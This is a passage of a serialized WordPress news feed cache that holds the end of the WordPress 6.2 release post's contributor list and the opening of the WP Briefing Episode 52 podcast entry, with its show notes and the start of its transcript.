href=\"https://profiles.wordpress.org/mciampini/\">Marco Ciampini</a> · <a href=\"https://profiles.wordpress.org/marekdedic/\">Marek Dědič</a> · <a href=\"https://profiles.wordpress.org/chaton666/\">Marie Comet</a> · <a href=\"https://profiles.wordpress.org/tyxla/\">Marin Atanasov</a> · <a href=\"https://profiles.wordpress.org/santosguillamot/\">Mario Santos</a> · <a href=\"https://profiles.wordpress.org/marissamakes/\">Marissa Matthews</a> · <a href=\"https://profiles.wordpress.org/clorith/\">Marius L. J.</a> · <a href=\"https://profiles.wordpress.org/markjaquith/\">Mark Jaquith</a> · <a href=\"https://profiles.wordpress.org/markoserb/\">Marko Ivanovic</a> · <a href=\"https://profiles.wordpress.org/marksabbath/\">marksabbath</a> · <a href=\"https://profiles.wordpress.org/flootr/\">Markus</a> · <a href=\"https://profiles.wordpress.org/mkox/\">Markus Kosmal</a> · <a href=\"https://profiles.wordpress.org/mhkuu/\">Martijn van der Klis</a> · <a href=\"https://profiles.wordpress.org/marybaum/\">Mary Baum</a> · <a href=\"https://profiles.wordpress.org/matclayton/\">matclayton</a> · <a href=\"https://profiles.wordpress.org/wetah/\">Mateus Machado Luna</a> · <a href=\"https://profiles.wordpress.org/paapst/\">Mathieu Paapst</a> · <a href=\"https://profiles.wordpress.org/mmaattiiaass/\">Matias Benedetto</a> · <a href=\"https://profiles.wordpress.org/matveb/\">Matias Ventura</a> · <a href=\"https://profiles.wordpress.org/mattkeys/\">Matt Keys</a> · <a href=\"https://profiles.wordpress.org/matt/\">Matt Mullenweg</a> · <a href=\"https://profiles.wordpress.org/matthiasreinholz/\">Matthias Reinholz</a> · <a href=\"https://profiles.wordpress.org/h4l9k/\">Mauricio</a> · <a href=\"https://profiles.wordpress.org/wppunk/\">Max</a> · <a href=\"https://profiles.wordpress.org/cadic/\">Max Lyuchin</a> · <a href=\"https://profiles.wordpress.org/maximej/\">Maxime J.</a> · <a href=\"https://profiles.wordpress.org/jamilbd07/\">MD Jamil Uddin</a> · <a href=\"https://profiles.wordpress.org/kawserz/\">Md Kawser Ahmed Khan Jami</a> · <a href=\"https://profiles.wordpress.org/rakibwordpress/\">Md Rakib Hossain</a> · <a href=\"https://profiles.wordpress.org/abirhasandipu/\">Md. Abir Hasan Dipu</a> · <a href=\"https://profiles.wordpress.org/reduanmasud/\">Md. Reduan Masud</a> · <a href=\"https://profiles.wordpress.org/mdviralsampat/\">mdviralsampat</a> · <a href=\"https://profiles.wordpress.org/mehulkaklotar/\">Mehul Kaklotar</a> · <a href=\"https://profiles.wordpress.org/mensmaximus/\">mensmaximus</a> · <a href=\"https://profiles.wordpress.org/meyegui/\">meyerdev.ch</a> · <a href=\"https://profiles.wordpress.org/mgol/\">mgol</a> · <a href=\"https://profiles.wordpress.org/mburridge/\">Michael Burridge</a> · <a href=\"https://profiles.wordpress.org/michael-kelly/\">Michael Kelly</a> · <a href=\"https://profiles.wordpress.org/czapla/\">Michal Czaplinski</a> · <a href=\"https://profiles.wordpress.org/michelmany/\">Michel Many</a> · <a href=\"https://profiles.wordpress.org/miguelaxcar/\">Miguel Axcar</a> · <a href=\"https://profiles.wordpress.org/mcsf/\">Miguel Fonseca</a> · <a href=\"https://profiles.wordpress.org/mmtr86/\">Miguel Torres</a> · <a href=\"https://profiles.wordpress.org/mikeschroder/\">Mike Schroder</a> · <a href=\"https://profiles.wordpress.org/mikestraw/\">Mike Straw</a> · <a href=\"https://profiles.wordpress.org/dimadin/\">Milan Dinić</a> · <a href=\"https://profiles.wordpress.org/milana_cap/\">Milana Cap</a> · <a href=\"https://profiles.wordpress.org/multidots1896/\">Minal Diwan</a> · <a href=\"https://profiles.wordpress.org/mitchellaustin/\">mitchellaustin</a> · <a href=\"https://profiles.wordpress.org/presents111/\">miya</a> · <a href=\"https://profiles.wordpress.org/monzuralam/\">Monzur Alam</a> · <a href=\"https://profiles.wordpress.org/mreishus/\">mreishus</a> · <a href=\"https://profiles.wordpress.org/mrwweb/\">mrwweb</a> · <a href=\"https://profiles.wordpress.org/mtias/\">mtias</a> · <a href=\"https://profiles.wordpress.org/mujuonly/\">mujuonly</a> · <a href=\"https://profiles.wordpress.org/mukesh27/\">Mukesh Panchal</a> · <a href=\"https://profiles.wordpress.org/faguni22/\">Mumtahina Faguni</a> · <a href=\"https://profiles.wordpress.org/tanjimtc71/\">Musarrat Anjum Chowdhury</a> · <a href=\"https://profiles.wordpress.org/amustaque97/\">Mustaque Ahmed</a> · <a href=\"https://profiles.wordpress.org/mw108/\">mw108</a> · <a href=\"https://profiles.wordpress.org/naeemhaque/\">Naeem Haque</a> · <a href=\"https://profiles.wordpress.org/nalininonstopnewsuk/\">Nalini Thakor</a> · <a href=\"https://profiles.wordpress.org/namithjawahar/\">Namith Jawahar</a> · <a href=\"https://profiles.wordpress.org/nathanatmoz/\">Nathan Johnson</a> · <a href=\"https://profiles.wordpress.org/nazmulhasan103/\">Nazmul Hasan</a> · <a href=\"https://profiles.wordpress.org/nendeb55/\">nendeb</a> · <a href=\"https://profiles.wordpress.org/neychok/\">Neycho Kalaydzhiev</a> · <a href=\"https://profiles.wordpress.org/nicholaswilson/\">nicholaswilson</a> · <a href=\"https://profiles.wordpress.org/ndiego/\">Nick Diego</a> · <a href=\"https://profiles.wordpress.org/nick_thegeek/\">Nick the Geek</a> · <a href=\"https://profiles.wordpress.org/nidhidhandhukiya/\">nidhidhandhukiya</a> · <a href=\"https://profiles.wordpress.org/nielslange/\">Niels Lange</a> · <a href=\"https://profiles.wordpress.org/ntsekouras/\">Nik Tsekouras</a> · <a href=\"https://profiles.wordpress.org/itsnikhilpatel/\">NikhilPatel</a> · <a href=\"https://profiles.wordpress.org/dhrupo/\">Niluthpal Purkayastha</a> · <a href=\"https://profiles.wordpress.org/dasnitesh780/\">Nitesh Das</a> · <a href=\"https://profiles.wordpress.org/nithi22/\">Nithin John</a> · <a href=\"https://profiles.wordpress.org/nithins53/\">Nithin SreeRaj</a> · <a href=\"https://profiles.wordpress.org/rnitinb/\">Nitin Rathod</a> · <a href=\"https://profiles.wordpress.org/nitman43/\">nitman43</a> · <a href=\"https://profiles.wordpress.org/noahtallen/\">Noah Allen</a> · <a href=\"https://profiles.wordpress.org/nuvopoint/\">nuvoPoint</a> · <a href=\"https://profiles.wordpress.org/oakesjosh/\">oakesjosh</a> · <a href=\"https://profiles.wordpress.org/obayedmamur/\">Obayed Mamur</a> · <a href=\"https://profiles.wordpress.org/ockham/\">ockham</a> · <a href=\"https://profiles.wordpress.org/oguzkocer/\">oguzkocer</a> · <a href=\"https://profiles.wordpress.org/oh_hello/\">oh_hello</a> · <a href=\"https://profiles.wordpress.org/hideokamoto/\">Okamoto Hidetaka</a> · <a href=\"https://profiles.wordpress.org/oglekler/\">Olga Gleckler</a> · <a href=\"https://profiles.wordpress.org/olliejones/\">OllieJones</a> · <a href=\"https://profiles.wordpress.org/alshakero/\">Omar Alshaker</a> · <a href=\"https://profiles.wordpress.org/paaljoachim/\">Paal Joachim Romdahl</a> · <a href=\"https://profiles.wordpress.org/pablohoney/\">PabloHoney</a> · <a href=\"https://profiles.wordpress.org/swissspidy/\">Pascal Birchler</a> · <a href=\"https://profiles.wordpress.org/pbearne/\">Paul Bearne</a> · <a href=\"https://profiles.wordpress.org/pbiron/\">Paul Biron</a> · <a href=\"https://profiles.wordpress.org/paulkevan/\">Paul Kevan</a> · <a href=\"https://profiles.wordpress.org/paulschreiber/\">Paul Schreiber</a> · <a href=\"https://profiles.wordpress.org/pavelevap/\">pavelevap</a> · <a href=\"https://profiles.wordpress.org/pbking/\">pbking</a> · <a href=\"https://profiles.wordpress.org/pedromendonca/\">Pedro Mendon&#231;a</a> · <a href=\"https://profiles.wordpress.org/pputzer/\">pepe</a> · <a href=\"https://profiles.wordpress.org/petaryoast/\">Petar Ratković</a> · <a href=\"https://profiles.wordpress.org/peterwilsoncc/\">Peter Wilson</a> · <a href=\"https://profiles.wordpress.org/petitphp/\">petitphp</a> · <a href=\"https://profiles.wordpress.org/walbo/\">Petter Walb&#248; Johnsg&#229;rd</a> · <a href=\"https://profiles.wordpress.org/phil-webster/\">Phil Webster</a> · <a href=\"https://profiles.wordpress.org/phillsav/\">Phill</a> · <a href=\"https://profiles.wordpress.org/iapial/\">Pial</a> · <a href=\"https://profiles.wordpress.org/nekojonez/\">Pieterjan Deneys</a> · <a href=\"https://profiles.wordpress.org/boniu91/\">Piotrek Boniu</a> · <a href=\"https://profiles.wordpress.org/knowingart_com/\">PJ Brunet</a> · <a href=\"https://profiles.wordpress.org/pkolenbr/\">pkolenbr</a> · <a href=\"https://profiles.wordpress.org/pooja1210/\">Pooja N Muchandikar</a> · <a href=\"https://profiles.wordpress.org/pravinparmar2404/\">Pravin Parmar</a> · <a href=\"https://profiles.wordpress.org/presskopp/\">Presskopp</a> · <a href=\"https://profiles.wordpress.org/ptahdunbar/\">Ptah Dunbar</a> · <a href=\"https://profiles.wordpress.org/raduiason/\">raduiason</a> · <a href=\"https://profiles.wordpress.org/initsogar/\">Rafael Agostini</a> · <a href=\"https://profiles.wordpress.org/rafinkhan/\">Rafin</a> · <a href=\"https://profiles.wordpress.org/rajanpanchal2028/\">Rajan Panchal</a> · <a href=\"https://profiles.wordpress.org/rajeshraval786/\">Rajesh Raval</a> · <a href=\"https://profiles.wordpress.org/rahmohn/\">Ramon Ahnert</a> · <a href=\"https://profiles.wordpress.org/ramon-fincken/\">ramon fincken</a> · <a href=\"https://profiles.wordpress.org/ramonopoly/\">Ramon James</a> · <a href=\"https://profiles.wordpress.org/razthee007/\">Razthee Md. Yakini</a> · <a href=\"https://profiles.wordpress.org/renatoagds/\">Renato Augusto Gama dos Santos</a> · <a href=\"https://profiles.wordpress.org/rezakhan995/\">Reza Khan</a> · <a href=\"https://profiles.wordpress.org/youknowriad/\">Riad Benguella</a> · <a href=\"https://profiles.wordpress.org/riccardodicurti/\">Riccardo Di Curti</a> · <a href=\"https://profiles.wordpress.org/richtabor/\">Rich Tabor</a> · <a href=\"https://profiles.wordpress.org/rinkychowdhury9/\">Rinky Chowdhury</a> · <a href=\"https://profiles.wordpress.org/ritteshpatel/\">Ritesh Patel</a> · <a href=\"https://profiles.wordpress.org/rjasdfiii/\">rjasdfiii</a> · <a href=\"https://profiles.wordpress.org/noisysocks/\">Robert Anderson</a> · <a href=\"https://profiles.wordpress.org/robinwpdeveloper/\">Robin</a> · <a href=\"https://profiles.wordpress.org/robin-labadie/\">Robin Labadie</a> · <a href=\"https://profiles.wordpress.org/rodage/\">rodage</a> · <a href=\"https://profiles.wordpress.org/rodricus/\">rodricus</a> · <a href=\"https://profiles.wordpress.org/ravanh/\">Rolf Allard van Hagen</a> · <a href=\"https://profiles.wordpress.org/digical/\">Ross Gile</a> · <a href=\"https://profiles.wordpress.org/roytanck/\">Roy Tanck</a> · <a href=\"https://profiles.wordpress.org/ruchirj/\">Ruchir Goswami</a> · <a href=\"https://profiles.wordpress.org/re_enter_rupok/\">Rupok</a> · <a href=\"https://profiles.wordpress.org/rryyaanndd/\">Ryan</a> · <a href=\"https://profiles.wordpress.org/ryankienstra/\">Ryan Kienstra</a> · <a href=\"https://profiles.wordpress.org/welcher/\">Ryan Welcher</a> · <a href=\"https://profiles.wordpress.org/looswebstudio/\">Ryo</a> · <a href=\"https://profiles.wordpress.org/sereedmedia/\">S&#233; Reed</a> · <a href=\"https://profiles.wordpress.org/sergiomdgomes/\">S&#233;rgio Gomes</a> · <a href=\"https://profiles.wordpress.org/soean/\">S&#246;ren Wrede</a> · <a href=\"https://profiles.wordpress.org/andy786/\">Sahil B.</a> · <a href=\"https://profiles.wordpress.org/stalukder03/\">Sajib Talukder</a> · <a href=\"https://profiles.wordpress.org/sakibmd/\">Sakib Mohammed</a> · <a href=\"https://profiles.wordpress.org/samful/\">Sam Fullalove</a> · <a href=\"https://profiles.wordpress.org/sam1el/\">sam1el</a> · <a href=\"https://profiles.wordpress.org/samiamnot/\">samiamnot</a> · <a href=\"https://profiles.wordpress.org/viralsampat/\">Sampat Viral</a> · <a href=\"https://profiles.wordpress.org/samruddhikhandale/\">samruddhikhandale</a> · <a href=\"https://profiles.wordpress.org/otto42/\">Samuel Wood (Otto)</a> · <a href=\"https://profiles.wordpress.org/sanjucta/\">sanjucta</a> · <a href=\"https://profiles.wordpress.org/sanketchodavadiya/\">Sanket Chodavadiya</a> · <a href=\"https://profiles.wordpress.org/sannevndrmeulen/\">Sanne van der Meulen</a> · <a href=\"https://profiles.wordpress.org/sapayth/\">sapayth</a> · <a href=\"https://profiles.wordpress.org/mikachan/\">Sarah Norris</a> · <a href=\"https://profiles.wordpress.org/sarathar/\">Sarath AR</a> · <a href=\"https://profiles.wordpress.org/saumil1611/\">Saumil Nerpagar</a> · <a href=\"https://profiles.wordpress.org/saxonfletcher/\">saxonfletcher</a> · <a href=\"https://profiles.wordpress.org/ira2910/\">Sazia Faizunnessa Ira</a> · <a href=\"https://profiles.wordpress.org/sc0ttkclark/\">Scott Kingsley Clark</a> · <a href=\"https://profiles.wordpress.org/countrymusicchicago/\">Scott Winterroth</a> · <a href=\"https://profiles.wordpress.org/hiyascout/\">Scout James</a> · <a href=\"https://profiles.wordpress.org/seanchayes/\">Sean Hayes</a> · <a href=\"https://profiles.wordpress.org/sergeybiryukov/\">Sergey Biryukov</a> · <a href=\"https://profiles.wordpress.org/seriouslysenpai/\">seriouslysenpai</a> · <a href=\"https://profiles.wordpress.org/wandering-aramean/\">Seth Miller</a> · <a href=\"https://profiles.wordpress.org/shahidul95/\">Shahidul Islam</a> · <a href=\"https://profiles.wordpress.org/shamayel007/\">Shamayel</a> · <a href=\"https://profiles.wordpress.org/shamimmiashuhagh/\">Shamim Mia</a> · <a href=\"https://profiles.wordpress.org/smeunus/\">Sharif Mohammad Eunus</a> · <a href=\"https://profiles.wordpress.org/shraboni/\">Shraboni</a> · <a href=\"https://profiles.wordpress.org/shubham1gupta/\">shubham1gupta</a> · <a href=\"https://profiles.wordpress.org/silicium23/\">Silicium</a> · <a href=\"https://profiles.wordpress.org/simongomes02/\">Simon Gomes</a> · <a href=\"https://profiles.wordpress.org/slieschke/\">Simon Lieschke</a> · <a href=\"https://profiles.wordpress.org/siobhan/\">Siobhan</a> · <a href=\"https://profiles.wordpress.org/calvinalkan/\">snicco.io</a> · <a href=\"https://profiles.wordpress.org/sruthi90/\">sruthi90</a> · <a href=\"https://profiles.wordpress.org/steelwagstaff/\">SteelWagstaff</a> · <a href=\"https://profiles.wordpress.org/ryokuhi/\">Stefano Minoia</a> · <a href=\"https://profiles.wordpress.org/stentibbing/\">stentibbing</a> · <a href=\"https://profiles.wordpress.org/pypwalters/\">Stephanie Walters</a> · <a href=\"https://profiles.wordpress.org/sabernhardt/\">Stephen Bernhardt</a> · <a href=\"https://profiles.wordpress.org/netweb/\">Stephen Edgar</a> · <a href=\"https://profiles.wordpress.org/stephym/\">Stephy Miehle</a> · <a href=\"https://profiles.wordpress.org/stephymiehle/\">stephymiehle</a> · <a href=\"https://profiles.wordpress.org/stevenkword/\">Steven Word</a> · <a href=\"https://profiles.wordpress.org/subrataemfluence/\">Subrata Sarkar</a> · <a href=\"https://profiles.wordpress.org/sumitsingh/\">Sumit Singh</a> · <a href=\"https://profiles.wordpress.org/sun/\">sun</a> · <a href=\"https://profiles.wordpress.org/sunyatasattva/\">sunyatasattva (a11n)</a> · <a href=\"https://profiles.wordpress.org/codemonksuvro/\">Suvro</a> · <a href=\"https://profiles.wordpress.org/syamraj24/\">syamraj24</a> · <a href=\"https://profiles.wordpress.org/cybr/\">Sybre Waaijer</a> · <a href=\"https://profiles.wordpress.org/afrin29/\">Syeda Sanjida Afrin</a> · <a href=\"https://profiles.wordpress.org/syhc/\">syhc</a> · <a href=\"https://profiles.wordpress.org/synchro/\">Synchro</a> · <a href=\"https://profiles.wordpress.org/syntaxart/\">syntaxart</a> · <a href=\"https://profiles.wordpress.org/szaqal21/\">szaqal21</a> · <a href=\"https://profiles.wordpress.org/tahmidulkarim/\">Tahmid ul Karim</a> · <a href=\"https://profiles.wordpress.org/tahminar27/\">Tahmina Rahman</a> · <a href=\"https://profiles.wordpress.org/inc2734/\">Takashi Kitajima</a> · <a href=\"https://profiles.wordpress.org/tanazmasaba/\">Tanaz Masaba</a> · <a href=\"https://profiles.wordpress.org/devtanbir/\">Tanbir Ahmod</a> · <a href=\"https://profiles.wordpress.org/tanner-m/\">Tanner Moushey</a> · <a href=\"https://profiles.wordpress.org/rahmantasnia/\">Tasnia Rahman Raima</a> · <a href=\"https://profiles.wordpress.org/teebee/\">teebee</a> · <a href=\"https://profiles.wordpress.org/tekapo/\">tekapo</a> · <a href=\"https://profiles.wordpress.org/thedaysse/\">thedaysse</a> · <a href=\"https://profiles.wordpress.org/iamjaydip/\">thejaydip</a> · <a href=\"https://profiles.wordpress.org/theode/\">theode</a> · <a href=\"https://profiles.wordpress.org/griffinjt/\">Thomas Griffin</a> · <a href=\"https://profiles.wordpress.org/thomasplevy/\">Thomas Patrick Levy</a> · <a href=\"https://profiles.wordpress.org/thomask/\">thomask</a> · <a href=\"https://profiles.wordpress.org/timbroddin/\">timbroddin</a> · <a href=\"https://profiles.wordpress.org/sippis/\">Timi Wahalahti</a> · <a href=\"https://profiles.wordpress.org/spaceshipone/\">Timoth&#233;e Brosille</a> · <a href=\"https://profiles.wordpress.org/timothyblynjacobs/\">Timothy Jacobs</a> · <a href=\"https://profiles.wordpress.org/tobiasbg/\">TobiasBg</a> · <a href=\"https://profiles.wordpress.org/tobifjellner/\">tobifjellner (Tor-Bjorn Fjellner)</a> · <a href=\"https://profiles.wordpress.org/tjnowell/\">Tom J Nowell</a> · <a href=\"https://profiles.wordpress.org/dziudek/\">Tomasz Dziuda</a> · <a href=\"https://profiles.wordpress.org/skithund/\">Toni Viemer&#246;</a> · <a href=\"https://profiles.wordpress.org/starbuck/\">Tony G</a> · <a href=\"https://profiles.wordpress.org/hellofromtonya/\">Tonya Mork</a> · <a href=\"https://profiles.wordpress.org/zodiac1978/\">Torsten Landsiedel</a> · <a href=\"https://profiles.wordpress.org/toru/\">Toru Miki</a> · <a href=\"https://profiles.wordpress.org/itowhid06/\">Towhidul I Chowdhury</a> · <a href=\"https://profiles.wordpress.org/travisaxton/\">travisaxton</a> · <a href=\"https://profiles.wordpress.org/triumvirate/\">triumvirate</a> · <a href=\"https://profiles.wordpress.org/dinhtungdu/\">Tung Du</a> · <a href=\"https://profiles.wordpress.org/umesh84/\">Umesh Gupta</a> · <a href=\"https://profiles.wordpress.org/upadalavipul/\">upadalavipul</a> · <a href=\"https://profiles.wordpress.org/eboxnet/\">Vagelis</a> · <a href=\"https://profiles.wordpress.org/vcanales/\">Vicente Canales</a> · <a href=\"https://profiles.wordpress.org/szepeviktor/\">Viktor Sz&#233;pe</a> · <a href=\"https://profiles.wordpress.org/virgar/\">Virginie Garnier</a> · <a href=\"https://profiles.wordpress.org/elifvish/\">Vishal Kumar</a> · <a href=\"https://profiles.wordpress.org/vladytimy/\">Vlad T</a> · <a href=\"https://profiles.wordpress.org/vtad/\">vtad</a> · <a href=\"https://profiles.wordpress.org/vykesmac/\">vykesmac</a> · <a href=\"https://profiles.wordpress.org/webmandesign/\">WebMan Design &#124; Oliver Juhas</a> · <a href=\"https://profiles.wordpress.org/webrocker/\">Webrocker</a> · <a href=\"https://profiles.wordpress.org/websitegenii/\">websitegenii</a> · <a href=\"https://profiles.wordpress.org/westonruter/\">Weston Ruter</a> · <a href=\"https://profiles.wordpress.org/whaze/\">whaze</a> · <a href=\"https://profiles.wordpress.org/winterpsv/\">winterpsv</a> · <a href=\"https://profiles.wordpress.org/wojsmol/\">wojsmol</a> · <a href=\"https://profiles.wordpress.org/wojtekn/\">Wojtek Naruniec</a> · <a href=\"https://profiles.wordpress.org/wojtekszkutnik/\">Wojtek Szkutnik</a> · <a href=\"https://profiles.wordpress.org/fierevere/\">Yui</a> · <a href=\"https://profiles.wordpress.org/yuliyan/\">Yuliyan Slavchev</a> · <a href=\"https://profiles.wordpress.org/zebaafiashama/\">Zeba Afia Shama</a> · <a href=\"https://profiles.wordpress.org/zenaulislam/\">Zenaul Islam</a> · <a href=\"https://profiles.wordpress.org/zevilz/\">zevilz</a> · <a href=\"https://profiles.wordpress.org/zieladam/\">zieladam</a> · <a href=\"https://profiles.wordpress.org/chesio/\">Česlav Przywara</a></p>\n\n\n\n<p>By release day, <a href=\"https://translate.wordpress.org/stats/\">70 locales had translated 90 percent</a> or more of WordPress 6.2 in their language. Community translators are hard at work ensuring more translations are on their way. Thank you to everyone who helps to make WordPress 6.2 available in 200 languages.</p>\n\n\n\n<h2 class=\"wp-block-heading\">A release haiku for 6.2&nbsp;</h2>\n\n\n\n<p>Six point two, so new<br>Shiny and ready for you<br>Congrats on hard work!</p>\n\n\n\n<p class=\"has-text-align-left has-tiny-font-size\"><em>* Portrait of Eric Allen Dolphy Jr. discovered via <a href=\"https://openverse.org/image/36720968-690c-4287-a2dd-619573cc23a6\">Openverse</a>. Colorization by D. Pountain; Original by F. Wolff</em>.<br>&#8220;<a rel=\"noreferrer noopener\" href=\"https://www.flickr.com/photos/98119031@N00/39509743850\" target=\"_blank\">eric dolphy</a>&#8221; by&nbsp;<a rel=\"noreferrer noopener\" href=\"https://www.flickr.com/photos/98119031@N00\" target=\"_blank\">dick_pountain</a>&nbsp;is licensed under&nbsp;<a rel=\"noreferrer noopener\" href=\"https://creativecommons.org/licenses/by-nc-sa/2.0/?ref=openverse\" target=\"_blank\">CC BY-NC-SA 2.0</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"14659\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:61:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n		\n		\n\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:94:\"WP Briefing: Episode 52: Workflows and Phase Three Visioning with Special Guest Héctor Prieto\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"https://wordpress.org/news/2023/03/episode-52-phase-three-with-hector-prieto/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 27 Mar 2023 12:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:7:\"Podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:11:\"wp-briefing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/news/?post_type=podcast&p=14697\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:147:\"On this week\'s episode, special guest Héctor Prieto joins Josepha in a discussion about phase three and why it\'s more than collaborative editing. \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"enclosure\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"url\";s:60:\"https://wordpress.org/news/files/2023/03/WP-Briefing-052.mp3\";s:6:\"length\";s:1:\"0\";s:4:\"type\";s:0:\"\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Santana Inniss\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:25748:\"\n<p>On Episode fifty-two of the WordPress Briefing podcast, join WordPress Executive Director Josepha Haden Chomphosy and special guest Héctor Prieto as they discuss phase three and why it&#8217;s more than just collaborative editing!</p>\n\n\n\n<p><em><strong>Have a question you&#8217;d like answered? You can submit them to <a href=\"mailto:wpbriefing@wordpress.org\">wpbriefing@wordpress.org</a>, either written or as a voice recording.</strong></em></p>\n\n\n\n<h2 class=\"wp-block-heading\">Credits</h2>\n\n\n\n<p>Editor:&nbsp;<a href=\"https://profiles.wordpress.org/dustinhartzler/\">Dustin Hartzler</a><br>Logo:&nbsp;<a href=\"https://profiles.wordpress.org/javiarce/\" data-type=\"URL\" data-id=\"https://profiles.wordpress.org/javiarce/\">Javier Arce</a><br>Production:&nbsp;<a href=\"https://profiles.wordpress.org/santanainniss/\">Santana Inniss</a><br>Song: Fearless First by Kevin MacLeod </p>\n\n\n\n<p><em><strong>Have a question you&#8217;d like answered? You can submit them to <a href=\"mailto:wpbriefing@wordpress.org\">wpbriefing@wordpress.org</a>, either written or as a voice recording.</strong></em></p>\n\n\n\n<h2 class=\"wp-block-heading\">Show Notes</h2>\n\n\n\n<ul>\n<li><a href=\"https://riad.blog/2020/06/11/write-as-blocks-in-an-encrypted-collaborative-environment/\">Write as Blocks in an Encrypted Collaborative Environment by Riad Benguella</a> </li>\n\n\n\n<li><a href=\"https://github.com/youknowriad/asblocks\" data-type=\"URL\" data-id=\"https://github.com/youknowriad/asblocks\">Riad Benguella’s collaborative editing GitHub repository</a></li>\n\n\n\n<li><a href=\"https://profiles.wordpress.org/youknowriad/\">Riad Benguella&#8217;s WordPress.org Profile</a></li>\n\n\n\n<li><a href=\"https://github.com/WordPress/gutenberg/pull/23129\" data-type=\"URL\" data-id=\"https://github.com/WordPress/gutenberg/pull/23129\">Block Collab: New package, a framework for collaborative editing GitHub PR</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/24/phase-3-collaboration/\">Phase 3: Collaboration</a></li>\n\n\n\n<li><a href=\"https://github.com/WordPress/gutenberg/issues/48457\" data-type=\"URL\" data-id=\"https://github.com/WordPress/gutenberg/issues/48457\">Matías Ventura Quick Search GH Issue</a></li>\n\n\n\n<li><a href=\"https://profiles.wordpress.org/matveb/\">Matías Ventura WordPress.org Profile</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/23/wordpress-6-2-release-day-process/\">WordPress 6.2 Release Day Process</a></li>\n\n\n\n<li><a href=\"https://wordpress.org/news/2023/03/introducing-the-wordpress-developer-blog/\">Introducing the WordPress Developer Blog</a></li>\n\n\n\n<li><a href=\"https://europe.wordcamp.org/2022/contributor-day/\" data-type=\"URL\" data-id=\"https://europe.wordcamp.org/2022/contributor-day/\">WordCamp Europe Contributor Day Registration</a></li>\n\n\n\n<li><a href=\"https://wp20.wordpress.net/wapuu-coloring-giveaway-style-your-own-party-wapuu/\" data-type=\"URL\" data-id=\"https://wp20.wordpress.net/wapuu-coloring-giveaway-style-your-own-party-wapuu/\">WP20 Wapuu Coloring Giveaway</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\">Transcript</h2>\n\n\n\n<span id=\"more-14697\"></span>\n\n\n\n<p>[Josepha Haden Chomphosy 00:00:00]&nbsp;</p>\n\n\n\n<p>Hello everyone, and welcome to the WordPress Briefing, the podcast where you can catch quick explanations of the ideas behind the WordPress open source project, some insight into the community that supports it, and get a small list of big things coming up in the next two weeks. I&#8217;m your host, Josepha Haden Chomphosy. Here we go.&nbsp;</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:00:40]<br><br>I have with me today Hécto Prieto. You all may know him from the WordPress Slack. He recently was, I believe, a release coordinator, maybe for the last release. Was that for 6.1?</p>\n\n\n\n<p>[Héctor Prieto 00:00:51]<br><br>Yes. It was for 6.1 and also 6.0, in fact.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:00:54]<br><br>All right. Well, welcome to the WordPress Briefing today. How are you doing?</p>\n\n\n\n<p>[Héctor Prieto 00:00:59]&nbsp;</p>\n\n\n\n<p>Well, I&#8217;m excited to be here. I&#8217;m a longtime listener of the podcast since the first episode. So I&#8217;m super excited to be here with you today.</p>\n\n\n\n<p>[Josepha Haden Chomphosy 00:01:06]<br><br>Yes. Longtime listener. First-time caller. All right, well, we&#8217;re gonna have a topic that just dumps you right in the soup, as they say in the 